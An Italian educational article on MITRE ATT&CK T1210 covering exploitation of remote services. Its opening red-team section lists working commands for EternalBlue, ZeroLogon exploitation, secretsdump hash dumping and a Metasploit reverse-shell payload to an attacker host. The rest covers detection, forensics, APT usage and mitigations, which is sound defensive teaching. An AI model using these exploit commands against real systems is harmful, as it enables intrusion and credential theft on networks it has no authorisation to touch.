Sfruttamento di Servizi Remoti: Exploitation of Remote Services (T1210)

L'exploitation di servizi remoti in un engagement red team segue una sequenza ben definita: enumerazione dei servizi, identificazione della vulnerabilità, exploit, e conferma dell'accesso. Vediamo come replicarla con tool reali in un ambiente di laboratorio controllato.

La prima fase è la scoperta. Nmap (open source) è il punto di partenza naturale. Per identificare host con SMBv1 attivo e potenzialmente vulnerabili a EternalBlue, il comando più diretto è:

nmap -p 445 --script smb-vuln-ms17-010 -oA eternalblue_scan <target_range>

Questo script NSE verifica la presenza della vulnerabilità MS17-010 senza eseguire exploit attivo, producendo output classificato come "VULNERABLE" o "NOT VULNERABLE". Per una scansione più ampia che includa RDP e altri servizi tipicamente bersagliati:

nmap -sV -p 445,3389,5985,5986,1433,3306,5900,427 --open -oA lateral_services <target_range>

Per ZeroLogon (CVE-2020-1472), la verifica può essere effettuata con Impacket (open source), la suite Python di riferimento per i protocolli Windows. Lo script zerologon_tester.py, disponibile in diversi repository pubblici come proof-of-concept, verifica se un domain controller è vulnerabile senza alterarne lo stato:

python3 zerologon_tester.py <dc_netbios_name> <dc_ip>

In un esercizio autorizzato, l'exploit completo si esegue con zerologon_exploit.py dello stesso ecosistema, seguito dal dump degli hash con:

secretsdump.py -no-pass -just-dc /<dc_netbios_name>$@<dc_ip>

Per EternalBlue, Metasploit Framework (open source) offre il modulo più stabile e collaudato. La sequenza operativa nel contesto msfconsole è:

use exploit/windows/smb/ms17_010_eternalblue set RHOSTS set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <attacker_ip> exploit

Se l'ambiente target include BlueKeep (CVE-2019-0708), Metasploit dispone del modulo exploit/windows/rdp/cve_2019_0708_bluekeep_rce, anche se la stabilità varia in base alla versione del target e al livello di patch parziale.

Per ambienti VMware vCenter, CrackMapExec (open source) consente di verificare rapidamente la raggiungibilità di servizi e testare credenziali recuperate da exploit precedenti:

crackmapexec smb <target_range> -u -p --shares

Un consiglio pratico: in laboratorio, costruite una piccola rete con macchine Windows 7 SP1 non patchate e un domain controller Windows Server 2016 pre-agosto 2020. Questo vi permette di esercitare sia l'EternalBlue chain che la ZeroLogon chain in un contesto realistico ma controllato, documentando ogni passaggio per il report.

Il rilevamento dell'exploitation di servizi remoti è un esercizio di correlazione: nessun singolo evento è sufficiente, ma la combinazione di indicatori nel tempo racconta una storia chiara. Le analytic documentate per questa tecnica coprono quattro piattaforme — Windows, Linux, ESXi e macOS — e condividono un principio comune: collegare una connessione inbound su porte di servizio a comportamenti anomali del servizio stesso.

Su Windows (AN0327), la logica è potente nella sua semplicità. Il SIEM deve correlare connessioni in ingresso sulle porte 445, 135, 3389, 5985/5986, 1433, 3306 con tre classi di eventi successivi entro una finestra di 10 minuti: crash o restart anomalo del servizio (EventLog System, EventCode 7034 e 7031), creazione di processi figli sospetti sotto il contesto del servizio (Sysmon EventID 1), e connessioni laterali in uscita dal sistema appena compromesso. La chiave del tuning è la whitelist delle reti di management — parametro AllowedAdminCIDRs — per escludere il traffico amministrativo legittimo che altrimenti genererebbe un volume insostenibile di falsi positivi.

Per EternalBlue specificamente, un indicatore forte è la creazione di un processo figlio sotto lsass.exe o sotto il servizio svchost.exe che gestisce il server SMB. Un alert mirato potrebbe filtrare Sysmon EventID 1 dove il ParentImage contiene svchost.exe e il processo figlio è cmd.exe, powershell.exe o binari non attesi.

Su Linux (AN0328), il monitoraggio si sposta su auditd e syslog. I demoni da osservare sono sshd, smbd, nfsd, httpd, nginx, mysqld, postgres e redis. L'indicatore critico è la comparsa di core dump nelle directory /var/crash o /var/lib/systemd/coredump correlata con lo spawn di shell (/bin/bash, /bin/sh) dal contesto del servizio. Le regole auditd con SYSCALL di tipo execve filtrate per il parent process del demone sono il fondamento di questa detection.

Per ESXi (AN0329), l'attenzione si concentra sulle porte 427 (OpenSLP), 443, 902 e 5989 (CIM). I crash di hostd o vpxa nei log, combinati con nuove connessioni outbound dall'host ESXi verso asset interni, sono il segnale di compromissione. Il parametro MgmtCIDRs va configurato rigorosamente con le sole reti di gestione vCenter.

Il tasso di errore delle connessioni è un ulteriore indicatore: il parametro MinConnErrorRate al 30% cattura i tentativi di exploitation falliti che precedono quello riuscito. Un attaccante che lancia exploit contro servizi non vulnerabili genera connessioni abortite in rapida successione — un pattern facilmente distinguibile dall'uso legittimo.

L'analisi forense di un lateral movement via exploit di servizi remoti lascia tracce su entrambi i lati della connessione — l'host sorgente e il sistema compromesso — e la ricostruzione della timeline richiede di intrecciare artefatti di rete, di sistema e del servizio bersaglio.

Sul sistema target Windows, il punto di partenza è il log di Sistema. Gli EventCode 7034 (servizio terminato inaspettatamente) e 7031 (servizio crashato con azione di recovery) raccontano l'instabilità provocata dall'exploit. Per EternalBlue, il servizio coinvolto è tipicamente Server (srv2.sys); per ZeroLogon, il servizio Netlogon. La correlazione temporale tra questi eventi e la comparsa di nuovi processi è fondamentale.

I log Sysmon, se disponibili, offrono una granularità superiore. L'EventID 1 (process creation) rivela la catena: il processo del servizio sfruttato genera un figlio anomalo. Per EternalBlue, si osserva frequentemente spoolsv.exe o lsass.exe che lanciano cmd.exe o rundll32.exe. L'EventID 3 (network connection) del processo exploit rivela connessioni callback verso l'host attaccante o verso ulteriori target laterali.

Un artefatto spesso trascurato ma prezioso è la memoria del crash. Se il servizio ha generato un dump (verificabile in C:\Windows\Minidump o tramite Windows Error Reporting in C:\ProgramData\Microsoft\Windows\WER), l'analisi del dump con WinDbg (gratuito, incluso nel Windows SDK) può rivelare lo shellcode iniettato e l'indirizzo di ritorno manipolato.

Per ZeroLogon, gli artefatti sono diversi. Il log Security con EventCode 4742 (modifica account computer) mostra la reimpostazione della password del domain controller. L'EventCode 5805 nel log System indica un fallimento di autenticazione Netlogon — i tentativi ripetuti con password vuota che precedono lo sfruttamento riuscito generano una serie di questi eventi.

Su Linux, la ricostruzione si basa su artefatti differenti. I core dump in /var/crash o /var/lib/systemd/coredump contengono il contesto del crash del demone sfruttato e possono essere analizzati con GDB (open source). I log di journalctl filtrati per l'unità del servizio compromesso mostrano il timestamp esatto del crash e del restart. Le regole auditd, se erano attive, registrano le execve syscall che documentano ogni processo generato dal demone dopo l'exploit.

Per gli ambienti ESXi, i log hostd.log e vpxa.log in /var/log/ registrano crash e restart dei servizi di gestione. Il file vobd.log può contenere tracce delle connessioni OpenSLP anomale che precedono l'exploitation. La timeline va integrata con i netflow catturati dagli switch o dai firewall perimetrali per correlare il momento dell'exploit con il traffico laterale successivo.

Un approccio efficace è costruire una super-timeline con Plaso (open source) che integri log eventi Windows, log Sysmon, MFT e log di rete in un unico flusso cronologico, filtrando poi per la finestra temporale dell'incidente.

Il panorama degli 11 gruppi APT associati a questa tecnica rivela due pattern dominanti che un analista di intelligence deve saper riconoscere: la convergenza verso un ristretto set di vulnerabilità e la correlazione tra sofisticazione del gruppo e scelta dell'exploit.

Wizard Spider (G0102) rappresenta l'archetipo dell'operatore cybercriminale evoluto. Il gruppo sfrutta sia EternalBlue (MS17-010) per la propagazione laterale via SMB sia ZeroLogon (CVE-2020-1472) per la compromissione dei domain controller, combinando i due exploit in catene d'attacco che partono dal worm e arrivano al dominio completo. Il loro arsenale software — TrickBot e Emotet come vettori di distribuzione, con exploit integrati nei moduli di propagazione — conferma un modello operativo industrializzato. TrickBot in particolare impiega moduli dedicati (wormwinDll, wormDll, mwormDll, nwormDll, tabDll) per il lateral movement via EternalBlue e EternalRomance.

APT28 (G0007), attore statale russo, ha sfruttato vulnerabilità SMB per il lateral movement, dimostrando che anche gruppi con capacità di sviluppo exploit proprie ricorrono a vulnerabilità note quando l'efficacia è garantita. Lo stesso pragmatismo si osserva in Tonto Team (G0131), gruppo legato alla Cina, che utilizza EternalBlue per il movimento laterale, e in Threat Group-3390 (G0027), anch'esso operatore cinese, che impiega MS17-010 con lo stesso obiettivo.

Il cluster iraniano è particolarmente significativo. Fox Kitten (G0117) sfrutta vulnerabilità in servizi remoti incluso RDP, mentre MuddyWater (G0069) si concentra su ZeroLogon. La convergenza di due gruppi iraniani distinti sulla stessa classe di vulnerabilità suggerisce una possibile condivisione di strumenti o intelligence operativa all'interno dell'ecosistema cyber iraniano.

Earth Lusca (G1006) si distingue per l'uso di Mimikatz come veicolo di delivery per l'exploit ZeroLogon, una scelta che indica un approccio più artigianale rispetto all'automazione di Wizard Spider. Ember Bear (G1003), Dragonfly (G0035), menuPass (G0045) e FIN7 (G0046) completano il quadro, tutti convergendo sullo stesso duo di vulnerabilità: EternalBlue e/o ZeroLogon.

Sul versante software, la mappa è eloquente. WannaCry, NotPetya, Bad Rabbit, Emotet, QakBot, Conficker, Lucifer e InvisiMole incorporano exploit SMB per l'auto-propagazione — un tratto comune che trasforma vulnerabilità note in vettori di diffusione massiva. Flame e Stuxnet, malware più datati ma storicamente significativi, sfruttavano la vulnerabilità Print Spooler MS10-061, anticipando un pattern che si ripresenterà anni dopo con PrintNightmare. Tool offensivi come Empire (open source) e PoshC2 (open source) includono moduli per lo sfruttamento SMB, rendendo queste capacità accessibili anche ad operatori meno sofisticati.

Il trend chiaro per il prossimo periodo è la migrazione degli exploit laterali verso ambienti di virtualizzazione — vCenter ed ESXi — dove una singola compromissione può garantire accesso a decine di macchine virtuali. I gruppi che storicamente hanno puntato su SMB e RDP stanno progressivamente aggiungendo queste capacità al proprio arsenale.

Framework MITRE ATT&CK: tecnica T1210, tattica TA0008. Mitigazioni: M1042, M1016, M1050, M1030, M1019, M1048, M1026, M1051. Detection: DET0118, analytic AN0327 (Windows), AN0328 (Linux), AN0329 (ESXi), AN0330 (macOS). Tool di detection: Nmap, Sysmon, auditd, Plaso, WinDbg. Integrato con conoscenza professionale per tool e procedure operative.